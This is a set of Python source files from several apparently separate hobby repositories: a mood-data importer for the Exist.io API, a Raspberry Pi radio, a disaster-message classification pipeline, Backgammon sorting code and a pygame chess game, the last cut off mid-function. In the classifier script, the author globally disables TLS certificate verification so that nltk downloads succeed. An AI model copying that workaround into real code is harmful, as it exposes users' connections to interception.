ratings = np.array(ratings)
ratings = ratings[ratings != 0.0]
return 0.0 if len(ratings) == 0 else ratings.mean()
def max(ratings):
# Remove 0.0 ratings
ratings = np.array(ratings)
ratings = ratings[ratings != 0.0]
return 0.0 if len(ratings) == 0 else ratings.max()
def min(ratings):
# Remove 0.0 ratings
ratings = np.array(ratings)
ratings = ratings[ratings != 0.0]
return 0.0 if len(ratings) == 0 else ratings.min()
def maj(ratings):
# Remove 0.0 ratings
ratings = np.array(ratings)
ratings = ratings[ratings != 0.0]
return 0.0 if len(ratings) == 0 else Counter(ratings).most_common()[0][0]
``` |
{
"source": "jjst/exist-mood-import",
"score": 3
} |
#### File: jjst/exist-mood-import/daylio.py
```python
import csv
from mood import Mood
from datetime import datetime
mood_levels = {
'rad': 5,
'good': 4,
'meh': 3,
'bad': 2,
'awful': 1
}
def mood_from_row(row):
year = row[0]
day_and_month = row[1]
date_string = f'{day_and_month} {year}'
try:
d = datetime.strptime(date_string, '%d %B %Y')
except ValueError as e:
return None
level = mood_levels[row[4].strip()]
tags = set([t.strip().replace(' ', '_') for t in row[5].strip().split(' | ')])
return Mood(date=d, level=level, comment=row[6], tags=tags)
def import_csv(csv_file_name):
with open(csv_file_name) as csvfile:
reader = csv.reader(csvfile)
headers = next(reader)
all_moods = [mood_from_row(row) for row in reader]
return all_moods
```
#### File: jjst/exist-mood-import/import.py
```python
import sys
import requests, json
import auth
import imoodjournal
import daylio
import os
import itertools
def acquire_attrs(attributes, token):
url = 'https://exist.io/api/1/attributes/acquire/'
attrs = [{"name": a, "active": True} for a in attributes]
response = requests.post(url, headers={'Authorization':f"Bearer {token}"},
json=attrs)
return response
def release_attrs(attributes, token):
url = 'https://exist.io/api/1/attributes/release/'
attrs = [{"name": a} for a in attributes]
response = requests.post(url, headers={'Authorization':f"Bearer {token}"},
json=attrs)
return response
def attributes(mood):
def create_attr(name, value, date):
date_format = '%Y-%m-%d'
return {"name": name, "date": date.strftime(date_format), "value": value}
attrs = [create_attr("mood", mood.level, mood.date)]
if mood.comment:
attrs.append(create_attr("mood_note", mood.comment, mood.date))
if mood.tags:
attrs.append(create_attr("custom", ", ".join(mood.tags), mood.date))
return attrs
def group(iterable, n, fillvalue=None):
args = [iter(iterable)] * n
return itertools.zip_longest(*args, fillvalue=fillvalue)
def publish_data(moods, token):
attrs = []
for mood in moods:
attrs += attributes(mood)
url = 'https://exist.io/api/1/attributes/update/'
response = requests.post(url, headers={'Authorization':f"Bearer {token}"},
json=attrs)
return response
def do_import(mood_data_file, token):
try:
mood_data = imoodjournal.import_csv(mood_data_file)
data_type = "imoodjournal"
except ValueError:
mood_data = daylio.import_csv(mood_data_file)
data_type = "daylio"
print(f"Loaded {data_type} data. Starting import...")
attrs = ["mood", "mood_note", "custom"]
try:
acquire_attrs(attrs, token)
chunk_size = 5
chunk_count = (len(mood_data) // chunk_size) + 1
for (i, moods) in enumerate(group(mood_data, chunk_size)):
res = publish_data(moods, token)
if res.status_code != 200:
print(f"Error sending request {res.json()}")
else:
json = res.json()
failed = json['failed']
if failed:
print(f"Some attributes failed to publish: {failed}")
success = json['success']
if success:
print(f"Successfully published attributes [chunk {i + 1}/{chunk_count}]:")
print("\n".join(" - " + str(a) for a in success))
print("Finished import.")
finally:
release_attrs(attrs, token)
def main():
try:
filename = sys.argv[1]
except IndexError:
print(f"Usage: {sys.argv[0]} <daylio_or_imoodjournal_export.csv>")
sys.exit(1)
token = os.environ.get("ACCESS_TOKEN") or auth.token()
do_import(filename, token)
if __name__ == '__main__':
main()
``` |
{
"source": "jjst/radiopi",
"score": 3
} |
#### File: jjst/radiopi/console.py
```python
import colorama
def print_available_streams(player):
print(f"{colorama.Style.BRIGHT}{colorama.Fore.GREEN}Welcome to RadioPi!{colorama.Style.RESET_ALL}")
print("Available streams")
print("=================")
for idx, stream in enumerate(player.streams):
if stream.name == player.current_stream().name:
style = colorama.Style.BRIGHT
text = f"[{idx}] {stream.name} - {stream.url} [currently listening]"
else:
style = colorama.Style.DIM
text = f"[{idx}] {stream.name} - {stream.url}"
print(style + text + colorama.Style.RESET_ALL)
print("=================")
def error(msg):
print(f"{colorama.Style.BRIGHT}{colorama.Fore.RED}{msg}{colorama.Style.RESET_ALL}")
```
#### File: jjst/radiopi/powerbutton.py
```python
import gpiozero
from gpiozero import Button
import warnings
BUTTON_GPIO_PIN = "GPIO16" # https://pinout.xyz/
SHORT_PRESS_SECONDS = 1
class PowerButton():
def __init__(self, player, pin=BUTTON_GPIO_PIN):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
self.button = Button(BUTTON_GPIO_PIN)
self.player = player
if self.button.is_pressed:
self.player.start()
self.button.when_pressed = lambda: self._when_pressed()
self.button.when_released = lambda: self._when_released()
def _when_released(self):
self.player.stop()
def _when_pressed(self):
self.player.start()
``` |
{
"source": "jjstrydom/disaster-response-pipelines",
"score": 3
} |
#### File: disaster-response-pipelines/data/process_data.py
```python
import sys
import pandas as pd
from sqlalchemy import create_engine
def load_data(messages_filepath, categories_filepath):
"""
Loads the data from csv files containing the messages and the target categories.
:param messages_filepath: file path string to the messages csv file
:param categories_filepath: file path string to the categories csv file
:return: dataframe containing the messages and the categories
"""
# load messages dataset
messages = pd.read_csv(messages_filepath)
# load categories dataset
categories = pd.read_csv(categories_filepath)
# merge datasets
df = pd.merge(messages, categories, left_on="id", right_on="id")
# create a dataframe of the 36 individual category columns
categories = df.categories.str.split(';', expand=True)
# extract a list of new column names for categories.
category_colnames = categories.iloc[0].str.split('-', expand=True)[0]
# rename the columns of `categories`
categories.columns = category_colnames
for column in categories:
# set each value to be the last character of the string & convert column from string to numeric
categories[column] = categories[column].str.split('-', expand=True)[1].astype(int)
# drop the original categories column from `df`
df.drop(columns=['categories'], inplace=True)
# concatenate the original dataframe with the new `categories` dataframe
df = pd.merge(df, categories, left_index=True, right_index=True)
return df
def clean_data(df):
"""
Takes a dataframe and cleans the data.
:param df: pandas dataframe containing the data to clean
:return: pandas dataframe with cleaned data
"""
# drop duplicates
df = df[df.duplicated() == False]
# force related category to be bi-variate
df.loc[df['related']==2,'related'] = 1
# remove outlier rows where there are more than 15 labels on a message
# df.drop(df[df.columns[4:]].sum(axis=1) >= 16, inplace=True)
# There is no data on category child_alone - removing for now to reduce requirements on downstream processes
# update: rubrik asks for all 36 columns which is silly :(
# df.drop(columns=['child_alone'], inplace=True)
return df
def save_data(df, database_filename):
"""
Saves the data to disk at the specified filepath.
:param df: pandas dataframe containing the data to save
:param database_filename: filepath & name string to save the data to
:return: None (data saved to disk)
"""
engine = create_engine(f"sqlite:///{database_filename}")
df.to_sql('project_data', engine, index=False)
def main():
if len(sys.argv) == 4:
messages_filepath, categories_filepath, database_filepath = sys.argv[1:]
print('Loading data...\n MESSAGES: {}\n CATEGORIES: {}'
.format(messages_filepath, categories_filepath))
df = load_data(messages_filepath, categories_filepath)
print('Cleaning data...')
df = clean_data(df)
print('Saving data...\n DATABASE: {}'.format(database_filepath))
save_data(df, database_filepath)
print('Cleaned data saved to database!')
else:
print('Please provide the filepaths of the messages and categories '\
'datasets as the first and second argument respectively, as '\
'well as the filepath of the database to save the cleaned data '\
'to as the third argument. \n\nExample: python process_data.py '\
'disaster_messages.csv disaster_categories.csv '\
'DisasterResponse.db')
if __name__ == '__main__':
main()
```
#### File: disaster-response-pipelines/models/train_classifier.py
```python
import sys
import psutil
from sqlalchemy import create_engine
import pandas as pd
import joblib
import nltk
import ssl
# dealing with certificate issues when trying to download using nltk
try:
_create_unverified_https_context = ssl._create_unverified_context
except AttributeError:
pass
else:
ssl._create_default_https_context = _create_unverified_https_context
nltk.download('punkt')
nltk.download('wordnet')
nltk.download('stopwords')
from nltk.tokenize import word_tokenize
from nltk.stem import WordNetLemmatizer
from nltk.corpus import stopwords
from sklearn.metrics import recall_score, precision_score, f1_score, accuracy_score, roc_auc_score
from sklearn.pipeline import Pipeline
from sklearn.model_selection import train_test_split
from sklearn.multioutput import MultiOutputClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer
from sklearn.model_selection import GridSearchCV
def load_data(database_filepath):
"""
Load the dataset from the local database specified by the database filepath and return the messages as well as their
targets and target names.
:param database_filepath: path string to database file location
:return: tuple of length 3 (X, Y, T) containing
X = messages,
Y = targets,
T = target names
"""
# load data from database
engine = create_engine(f"sqlite:///{database_filepath}")
df = pd.read_sql_table('project_data', con=engine)
X = df['message']
Y = df[df.columns[-36:]]
T = Y.columns
return X, Y, T
def tokenize(text):
"""
Take a piece of text and perform NLP (Natural Language Processing) steps. The function tokenizes the message text,
removes the stopwords, performs lemmatization, and converts the tokens to lowercase.
:param text: a string of text to process
:return: list containing clean tokes (strings) generated from the text
"""
# process text data to tokens
tokens = word_tokenize(text)
words = [w for w in tokens if w not in stopwords.words("english")]
lemmatizer = WordNetLemmatizer()
clean_tokens = []
for tok in words:
clean_tok = lemmatizer.lemmatize(tok).lower().strip()
clean_tokens.append(clean_tok)
return clean_tokens
def build_model():
"""
Construct the sklearn pipeline that vectorizes input messages, performs TF-IDF, and multi output classification
using a random forest classifier.
:return: a sklearn pipeline object
"""
pipeline = Pipeline([
('vect', CountVectorizer(tokenizer=tokenize)),
('tfidf', TfidfTransformer()),
('clf', MultiOutputClassifier(RandomForestClassifier(n_jobs=psutil.cpu_count()), n_jobs=psutil.cpu_count()))
])
return pipeline
def grid_search(pipeline):
parameters = {
'clf__estimator__n_estimators': [100, 1000],
# 'clf__estimator__criterion': ['gini', 'entropy'],
# 'clf__estimator__class_weight': [None, 'balanced', 'balanced_subsample']
}
cv = GridSearchCV(pipeline, param_grid=parameters)
return cv
# res = cv.fit(X_train, y_train)
# return res
def print_scores(category, precision, recall, f1score, accuracy, AUC):
"""
Print the scores nicely formatted so that consecutive prints using this function results in a table structure on
screen.
:param category: name of category as a string
:param precision: precision metric as a float
:param recall: recall metric as a float
:param f1score: f1score metric as a float
:param accuracy: accuracy metric as a float
:param AUC: AUC metric as a float
:return: None (prints to screen)
"""
print(f"{category:23}: {precision:9.3f} {recall:9.3f} {f1score:9.3f} {accuracy:9.3f} {AUC:9.3f}")
def evaluate_model(model, X_test, Y_test, category_names):
"""
Evaluate the performance of the model for each category and print it to screen.
:param model: the trained model to evaluate
:param X_test: Test messages
:param Y_test: Test targets
:param category_names: Category names of the targets present in the data.
:return: None (prints to screen)
"""
y_pred_raw = model.predict(X_test)
y_pred = pd.DataFrame(y_pred_raw, columns=category_names)
print(f"class : precision recall f1score accuracy AUC")
for c in category_names:
precision = precision_score(Y_test[c], y_pred[c], zero_division=0)
recall = recall_score(Y_test[c], y_pred[c], zero_division=0)
f1score = f1_score(Y_test[c], y_pred[c], zero_division=0)
accuracy = accuracy_score(Y_test[c], y_pred[c])
try:
AUC = roc_auc_score(Y_test[c], y_pred[c])
except ValueError:
AUC = float('nan')
print_scores(c, precision, recall, f1score, accuracy, AUC)
precision = precision_score(Y_test, y_pred, average='weighted', zero_division=0)
recall = recall_score(Y_test, y_pred, average='weighted', zero_division=0)
f1score = f1_score(Y_test, y_pred, average='weighted', zero_division=0)
accuracy = accuracy_score(Y_test, y_pred)
# remove columns that are made up of only 1 class so we can calculate a valid AUC
valid_cols = [c for c in Y_test.columns if len(Y_test[c].unique()) == 2]
AUC = roc_auc_score(Y_test[valid_cols], y_pred[valid_cols])
print(" - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -")
print_scores('TOTAL', precision, recall, f1score, accuracy, AUC)
def save_model(model, model_filepath):
"""
Saves the model to disk.
:param model: the trained model to save
:param model_filepath: filepath to save to
:return: None
"""
# save model to model filepath
joblib.dump(model, model_filepath)
def main():
if len(sys.argv) == 3:
database_filepath, model_filepath = sys.argv[1:]
print('Loading data...\n DATABASE: {}'.format(database_filepath))
X, Y, category_names = load_data(database_filepath)
X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.2)
print('Building model...')
model = build_model()
print('Building grid search over model parameters...')
grid = grid_search(model)
print('Training model...')
grid.fit(X_train, Y_train)
print(grid.best_params_)
# print('Training model...')
# grid.fit(X_train, Y_train)
print('Evaluating model...')
evaluate_model(grid, X_test, Y_test, category_names)
print('Saving model...\n MODEL: {}'.format(model_filepath))
save_model(grid, model_filepath)
print('Trained model saved!')
else:
print('Please provide the filepath of the disaster messages database '\
'as the first argument and the filepath of the pickle file to '\
'save the model to as the second argument. \n\nExample: python '\
'train_classifier.py ../data/DisasterResponse.db classifier.pkl')
if __name__ == '__main__':
main()
``` |
{
"source": "jj-style/Backgammon",
"score": 4
} |
#### File: Backgammon/Coursework/classUndoStack.py
```python
class MyStack():
def __init__(self):
self.size = 5
self.stack = [0 for i in range(self.size)]
self.front = -1
self.inStack = 0
def add(self,item):
if self.front != self.size-1:
if self.inStack < 5:
self.inStack+=1
self.front = (self.front+1) % self.size
self.stack[self.front] = item
else:
self.inStack-=1
self.front = -1
self.add(item)
def remove(self):
empty = self.isEmpty()
if not empty:
self.inStack-=1
self.front = (self.front-1) % self.size
return self.stack[(self.front+1) % self.size]
else:
return False
def isEmpty(self):
return (self.inStack == 0)
```
#### File: Backgammon/Coursework/merge_sort.py
```python
def merge(a,b,ob):
merged = []
while len(a) != 0 and len(b) != 0:
if a[0][ob] < b[0][ob] or a[0][ob] == b[0][ob]:
merged.append(a.pop(0))
elif a[0][ob] > b[0][ob]:
merged.append(b.pop(0))
if len(a) !=0 and len(b) == 0:
merged += a
elif len(a) == 0 and len(b) != 0:
merged += b
return merged
def mergesort(array,order_by):
if len(array) == 0 or len(array) == 1:
return array
else:
middle = int(len(array)/2)
a = mergesort(array[:middle],order_by)
b = mergesort(array[middle:],order_by)
return merge(a,b,order_by)
```
#### File: Backgammon/Coursework/radix_sort.py
```python
def getDig(n,modder,dig_array,maxLength,num):
dig = n % modder
actual_dig = int(dig / (modder/10))
modder *= 10
new_n = n - dig
dig_array.append(actual_dig)
if new_n == 0 and len(dig_array) == maxLength:
num[2] = dig_array
return num
return getDig(new_n,modder,dig_array,maxLength,num)
def fillBuckets(n,digits_array,radix_buckets):
for i in range(len(digits_array)):
radix_buckets[digits_array[i][2][n]].append(digits_array[i])
new_digits_array = []
for bucket in radix_buckets:
while len(bucket) != 0:
new_digits_array.append(bucket.pop(0))
return new_digits_array
def magic(numList):
sorted_list = []
for nums in numList:
s = ''.join(map(str, nums[2][::-1]))
nums[2] = s
sorted_list.append(nums)
return sorted_list
def radix(array):
radix_buckets = [[] for i in range(10)]
digits_array = []
ints_array = []
for i in array:
ints_array.append(i[2])
maxInt = 0
for i in ints_array:
if int(i) > maxInt:
maxInt = int(i)
maxInt = len(str(maxInt))
for num in array:
digits_array.append(getDig(int(num[2]),10,[],maxInt,num))
for i in range(maxInt):
digits_array = fillBuckets(i,digits_array,radix_buckets)
return magic(digits_array)
``` |
{
"source": "jj-style/Chess",
"score": 3
} |
#### File: jj-style/Chess/chess.py
```python
import pygame_setup as pg
import pygame, os, time, tkinter
import tkinter.messagebox
WHITE = (255,255,255)
BLACK = (0,0,0)
RED = (255,0,0)
GREEN = (0,255,0)
BLUE = (0,0,255)
BOARDBROWN = (117,57,4)
BOARDWHITE = (255,228,196)
current_directory = os.getcwd()
class BoardCell():
def __init__(self):
self.Color = None
self.ContainedPiece = None
self.X = 0
self.Y = 0
self.Width = 50
self.Height = 50
def SetX(self,x):
self.X = x
def SetY(self,y):
self.Y = y
def GetWidth(self):
return self.Width
def GetHeight(self):
return self.Height
def GetX(self):
return self.X
def GetY(self):
return self.Y
def SetColor(self,color):
self.Color = color
def ShowCell(self):
return pygame.draw.rect(app.getScreen(),self.Color,(self.X,self.Y,self.Width,self.Height),0)
def SetContainedPiece(self,ChessPiece):
self.ContainedPiece = ChessPiece
def GetContainedPiece(self):
return self.ContainedPiece
def ShowContainedPiece(self):
if self.ContainedPiece != None:
self.ContainedPiece.ShowPiece(self.X,self.Y)
class Piece():
def __init__(self,color):
self.Color = color
self.PieceImage = pygame.image.load("{}//Images//{}.png".format(current_directory,self.Name+self.Color))
self.PieceImage = pygame.transform.scale(self.PieceImage,(45,45))
def ShowPiece(self,x,y):
app.getScreen().blit(self.PieceImage,(x,y))
def GetName(self):
return self.Name
def GetColor(self):
return self.Color
class Pawn(Piece):
def __init__(self,color,moved=False):
self.Name = "Pawn"
self.HasBeenMoved = moved
Piece.__init__(self,color)
def SetHasBeenMoved(self):
self.HasBeenMoved = True
def GetHasBeenMoved(self):
return self.HasBeenMoved
def GetDestinations(self,PlayerTurn,CurrentCell):
x,y = GetIndexFromCell(CurrentCell)
ValidMoves = []
#Moves - [YOffset,XOffset]
BlackClearMoves = [[-1,0]]
WhiteClearMoves = [[1,0]]
if self.HasBeenMoved == False:
BlackClearMoves.append([-2,0])
WhiteClearMoves.append([2,0])
if PlayerTurn == "Black":
for PotentialMove in BlackClearMoves:
try:
if x+PotentialMove[0] >=0 and y+PotentialMove[1] >=0:
if Board[x+PotentialMove[0]][y+PotentialMove[1]].GetContainedPiece() == None:
ValidMoves.append(Board[x+PotentialMove[0]][y+PotentialMove[1]])
except:
pass
elif PlayerTurn == "White":
for PotentialMove in WhiteClearMoves:
try:
if x+PotentialMove[0] >=0 and y+PotentialMove[1] >=0:
if Board[x+PotentialMove[0]][y+PotentialMove[1]].GetContainedPiece() == None:
ValidMoves.append(Board[x+PotentialMove[0]][y+PotentialMove[1]])
except:
pass
BlackTakeMoves = [[-1,-1],[-1,1]]
WhiteTakeMoves = [[1,-1],[1,1]]
if PlayerTurn == "Black":
for PotentialMove in BlackTakeMoves:
try:
if Board[x+PotentialMove[0]][y+PotentialMove[1]].GetContainedPiece() != None:
if Board[x+PotentialMove[0]][y+PotentialMove[1]].GetContainedPiece().GetColor() != PlayerTurn:
ValidMoves.append(Board[x+PotentialMove[0]][y+PotentialMove[1]])
except:
pass
elif PlayerTurn == "White":
for PotentialMove in WhiteTakeMoves:
try:
if Board[x+PotentialMove[0]][y+PotentialMove[1]].GetContainedPiece() != None:
if Board[x+PotentialMove[0]][y+PotentialMove[1]].GetContainedPiece().GetColor() != PlayerTurn:
ValidMoves.append(Board[x+PotentialMove[0]][y+PotentialMove[1]])
except:
pass
return ValidMoves
class Rook(Piece):
def __init__(self,color):
self.Name = "Rook"
Piece.__init__(self,color)
def GetDestinations(self,PlayerTurn,CurrentCell):
ValidMoves = []
Staggers = [[0,1],[1,0],[0,-1],[-1,0]]
for Stagger in Staggers:
NextSquare = True
TempCurrentCell = CurrentCell
while NextSquare == True:
x,y = GetIndexFromCell(TempCurrentCell)
if x+Stagger[0] >=0 and y+Stagger[1] >=0:
try:
if Board[x+Stagger[0]][y+Stagger[1]].GetContainedPiece() == None:
ValidMoves.append(Board[x+Stagger[0]][y+Stagger[1]])
TempCurrentCell = Board[x+Stagger[0]][y+Stagger[1]]
elif Board[x+Stagger[0]][y+Stagger[1]].GetContainedPiece() != None:
if Board[x+Stagger[0]][y+Stagger[1]].GetContainedPiece().GetColor() != PlayerTurn:
ValidMoves.append(Board[x+Stagger[0]][y+Stagger[1]])
NextSquare = False
elif Board[x+Stagger[0]][y+Stagger[1]].GetContainedPiece().GetColor() == PlayerTurn:
NextSquare = False
except:
NextSquare = False
else:
NextSquare = False
return ValidMoves
class Knight(Piece):
def __init__(self,color):
self.Name = "Knight"
Piece.__init__(self,color)
def GetDestinations(self,PlayerTurn,CurrentCell):
ValidMoves = []
Staggers = [[2,1],[2,-1],[-2,1],[-2,-1],[1,2],[1,-2],[-1,2],[-1,-2]]
x,y = GetIndexFromCell(CurrentCell)
for Stagger in Staggers:
if x+Stagger[0] >=0 and y+Stagger[1] >=0:
try:
if Board[x+Stagger[0]][y+Stagger[1]].GetContainedPiece() == None:
ValidMoves.append(Board[x+Stagger[0]][y+Stagger[1]])
elif Board[x+Stagger[0]][y+Stagger[1]].GetContainedPiece() != None:
if Board[x+Stagger[0]][y+Stagger[1]].GetContainedPiece().GetColor() != PlayerTurn:
ValidMoves.append(Board[x+Stagger[0]][y+Stagger[1]])
elif Board[x+Stagger[0]][y+Stagger[1]].GetContainedPiece().GetColor() == PlayerTurn:
pass
except:
pass
else:
pass
return ValidMoves
class Bishop(Piece):
def __init__(self,color):
self.Name = "Bishop"
Piece.__init__(self,color)
def GetDestinations(self,PlayerTurn,CurrentCell):
ValidMoves = []
Staggers = [[1,1],[1,-1],[-1,-1],[-1,1]]
for Stagger in Staggers:
NextSquare = True
TempCurrentCell = CurrentCell
while NextSquare == True:
x,y = GetIndexFromCell(TempCurrentCell)
if x+Stagger[0] >=0 and y+Stagger[1] >=0:
try:
if Board[x+Stagger[0]][y+Stagger[1]].GetContainedPiece() == None:
ValidMoves.append(Board[x+Stagger[0]][y+Stagger[1]])
TempCurrentCell = Board[x+Stagger[0]][y+Stagger[1]]
elif Board[x+Stagger[0]][y+Stagger[1]].GetContainedPiece() != None:
if Board[x+Stagger[0]][y+Stagger[1]].GetContainedPiece().GetColor() != PlayerTurn:
ValidMoves.append(Board[x+Stagger[0]][y+Stagger[1]])
NextSquare = False
elif Board[x+Stagger[0]][y+Stagger[1]].GetContainedPiece().GetColor() == PlayerTurn:
NextSquare = False
except:
NextSquare = False
else:
NextSquare = False
return ValidMoves
class King(Piece):
def __init__(self,color,moved=False):
self.Name = "King"
self.HasBeenMoved = moved
Piece.__init__(self,color)
def SetHasBeenMoved(self):
self.HasBeenMoved = True
def GetHasBeenMoved(self):
return self.HasBeenMoved
def GetDestinations(self,PlayerTurn,CurrentCell):
ValidMoves = []
Staggers = [[1,1],[1,-1],[-1,-1],[-1,1],[0,1],[1,0],[0,-1],[-1,0]]
x,y = GetIndexFromCell(CurrentCell)
for Stagger in Staggers:
if x+Stagger[0] >=0 and y+Stagger[1] >=0:
try:
if Board[x+Stagger[0]][y+Stagger[1]].GetContainedPiece() == None:
ValidMoves.append(Board[x+Stagger[0]][y+Stagger[1]])
elif Board[x+Stagger[0]][y+Stagger[1]].GetContainedPiece() != None:
if Board[x+Stagger[0]][y+Stagger[1]].GetContainedPiece().GetColor() != PlayerTurn:
ValidMoves.append(Board[x+Stagger[0]][y+Stagger[1]])
elif Board[x+Stagger[0]][y+Stagger[1]].GetContainedPiece().GetColor() == PlayerTurn:
pass
except:
pass
else:
pass
y,x = GetIndexFromCell(CurrentCell)
if self.HasBeenMoved == False:
if Board[y][0].GetContainedPiece() != None:
if Board[y][0].GetContainedPiece().GetName() == "Rook":
ClearLeft = True
for i in range(1,x):
if Board[y][i].GetContainedPiece() != None:
ClearLeft = False
break
if ClearLeft == True:
ValidMoves.append(Board[y][x-2])
if Board[y][7].GetContainedPiece() != None:
if Board[y][7].GetContainedPiece().GetName() == "Rook":
ClearRight = True
for i in range(x+1,7):
if Board[y][i].GetContainedPiece() != None:
ClearRight = False
break
if ClearRight == True:
ValidMoves.append(Board[y][x+2])
return ValidMoves
class Queen(Piece):
def __init__(self,color):
self.Name = "Queen"
Piece.__init__(self,color)
def GetDestinations(self,PlayerTurn,CurrentCell):
ValidMoves = []
Staggers = [[1,1],[1,-1],[-1,-1],[-1,1],[0,1],[1,0],[0,-1],[-1,0]]
for Stagger in Staggers:
NextSquare = True
TempCurrentCell = CurrentCell
while NextSquare == True:
x,y = GetIndexFromCell(TempCurrentCell)
if x+Stagger[0] >=0 and y+Stagger[1] >=0:
try:
if Board[x+Stagger[0]][y+Stagger[1]].GetContainedPiece() == None:
ValidMoves.append(Board[x+Stagger[0]][y+Stagger[1]])
TempCurrentCell = Board[x+Stagger[0]][y+Stagger[1]]
elif Board[x+Stagger[0]][y+Stagger[1]].GetContainedPiece() != None:
if Board[x+Stagger[0]][y+Stagger[1]].GetContainedPiece().GetColor() != PlayerTurn:
ValidMoves.append(Board[x+Stagger[0]][y+Stagger[1]])
NextSquare = False
elif Board[x+Stagger[0]][y+Stagger[1]].GetContainedPiece().GetColor() == PlayerTurn:
NextSquare = False
except:
NextSquare = False
else:
NextSquare = False
return ValidMoves
class PlayerClass():
def __init__(self,PlayerColor):
self.PlayerColor = PlayerColor
self.TimePlayed = 0
self.InCheck = False
def GetPlayerColor(self):
return self.PlayerColor
def SetInCheck(self,NewStatus):
self.InCheck = NewStatus
def GetInCheck(self):
return self.InCheck
def IsInCheck(self):
if self.PlayerColor == "Black":
OtherPlayerColor = "White"
else:
OtherPlayerColor = "Black"
for i in range(8):
for j in range(8):
Piece = Board[i][j].GetContainedPiece()
if Piece != None:
if Piece.GetColor() != self.PlayerColor:# and Piece.GetName() != "King":
Destinations = Piece.GetDestinations(OtherPlayerColor,Board[i][j])
for Dest in Destinations:
if Dest.GetContainedPiece() != None:
if Dest.GetContainedPiece().GetName() == "King":
if Dest.GetContainedPiece().GetColor() == self.PlayerColor:
return True
return False
class GameClass():
def __init__(self):
self.Turn = "White"
def SwitchTurn(self):
if self.Turn == "White":
self.Turn = "Black"
else:
self.Turn = "White"
def GetTurn(self):
return self.Turn
#__________________________________#
def SetBoard():
Count = 0
for i in range(8):
for j in range(8):
if Count%2 == 0:
if i%2==0:
Board[i][j].SetColor(BOARDWHITE)
else:
Board[i][j].SetColor(BOARDBROWN)
else:
if i%2 == 0:
Board[i][j].SetColor(BOARDBROWN)
else:
Board[i][j].SetColor(BOARDWHITE)
Board[i][j].SetX(Count*Board[i][j].GetWidth())
Board[i][j].SetY(i*Board[i][j].GetHeight())
Count = (Count + 1) % 8
def SetPieces(filename):
LoadBoard = []
File = open(filename,'r')
for Row in File.readlines():
LoadBoard.append(Row.strip().split(','))
File.close()
for i in range(8):
for k in range(8):
if LoadBoard[i][k] != 'XX':
Piece = LoadBoard[i][k]
Color = GetColor(Piece[1])
if Piece[0] == "P":
Board[i][k].SetContainedPiece(Pawn(Color))
elif Piece[0] == "p":
Board[i][k].SetContainedPiece(Pawn(Color,True))
elif Piece[0] == "R":
Board[i][k].SetContainedPiece(Rook(Color))
elif Piece[0] == "N":
Board[i][k].SetContainedPiece(Knight(Color))
elif Piece[0] == "B":
Board[i][k].SetContainedPiece(Bishop(Color))
elif Piece[0] == "K":
Board[i][k].SetContainedPiece(King(Color))
elif Piece[0] == "k":
Board[i][k].SetContainedPiece(King(Color,True))
elif Piece[0] == "Q":
Board[i][k].SetContainedPiece(Queen(Color))
if LoadBoard[-1][0] == "Black":
Game.SwitchTurn()
def GetColor(Color):
if Color == "W":
return "White"
else:
return "Black"
def AskSave():
root = tkinter.Tk()
root.withdraw()
response = tkinter.messagebox.askyesno("Warning","Would you like to save your game?")
root.update()
return response
def SaveGame():
print("saving game...")
SaveBoard = []
for i in range(8):
Row = []
for j in range(8):
try:
ChessPiece = Board[i][j].GetContainedPiece().GetName()
PieceColor = Board[i][j].GetContainedPiece().GetColor()
if ChessPiece == "King" or ChessPiece == "Pawn":
if Board[i][j].GetContainedPiece().GetHasBeenMoved() == True:
ChessPiece = ChessPiece.lower()
except:
ChessPiece, PieceColor = "X", "X"
finally:
Row.append(ChessPiece[0] + PieceColor[0])
SaveBoard.append(','.join(Row))
File = open("save_game.txt","w")
for Row in SaveBoard:
File.write("".join(Row)+"\n")
File.write(Game.GetTurn())
File.close()
def ShowBoard():
for i in range(8):
for j in range(8):
Board[i][j].ShowCell()
def ShowPieces():
for i in range(8):
for j in range(8):
if Board[i][j].GetContainedPiece() != None:
Board[i][j].ShowContainedPiece()
def GetIndexFromCell(Cell):
for i in range(8):
for j in range(8):
if Board[i][j] == Cell:
return i,j
#__________________________________#
def Turn(Player):
CanMove = GetCanMove(Player.GetPlayerColor())
if not CanMove:
return
if Player.IsInCheck() == True:
CheckMate = InCheckMate(Player,Player.GetPlayerColor())
if CheckMate:
print("Check mate")
return "Game Over"
else:
Render(Check=True)
print("Check")
ValidPiece = False
while not ValidPiece:
PieceCell = SelectPiece()
Piece = PieceCell.GetContainedPiece()
if Piece.GetColor() == Player.GetPlayerColor():
ValidPiece = True
ValidMoves = Piece.GetDestinations(Player.GetPlayerColor(),PieceCell)
ValidMoves = FilterUnCheckMoves(PieceCell,ValidMoves,Player)
if Player.IsInCheck() == True:
ValidMoves = FilterUnCheckMoves(PieceCell,ValidMoves,Player)
if len(ValidMoves) == 0:
print("No valid moves for that piece")
return Turn(Player)
else:
Render(True,ValidMoves,Check=Player.IsInCheck())
ValidDest = False
DestCell = SelectDest()
if DestCell not in ValidMoves:
Render(Check=Player.IsInCheck())
return Turn(Player)
else:
if Piece.GetName() == "Pawn" or Piece.GetName() == "King":
Piece.SetHasBeenMoved()
if Piece.GetName() == "King":
SY, SX = GetIndexFromCell(PieceCell)
DY, DX = GetIndexFromCell(DestCell)
if abs(SX-DX) != 1 and SY-DY == 0:
CastleSwap(PieceCell,DestCell)
else:
Move(PieceCell,DestCell)
else:
Move(PieceCell,DestCell)
def SelectPiece():
while True:
for event in pygame.event.get():
if event.type == pygame.QUIT:
SaveGameResponse = AskSave()
if SaveGameResponse == True:
SaveGame()
app.exit()
elif event.type == pygame.MOUSEBUTTONDOWN:
mx, my = pygame.mouse.get_pos()
for i in range(8):
for j in range(8):
Cell = Board[i][j]
if Cell.ShowCell().collidepoint(mx,my):
if Cell.GetContainedPiece() != None:
print(Cell.GetContainedPiece().GetName())
return Cell
def SelectDest():
while True:
for event in pygame.event.get():
if event.type == pygame.QUIT:
SaveGameResponse = AskSave()
if SaveGameResponse == True:
SaveGame()
app.exit()
elif event.type == pygame.MOUSEBUTTONDOWN:
mx, my = pygame.mouse.get_pos()
for i in range(8):
for j in range(8):
Cell = Board[i][j]
if Cell.ShowCell().collidepoint(mx,my):
return Cell
def Move(Source,Dest):
Dest.SetContainedPiece(Source.GetContainedPiece())
Source.SetContainedPiece(None)
def CastleSwap(SourceKing,Dest):
DY, DX = GetIndexFromCell(Dest)
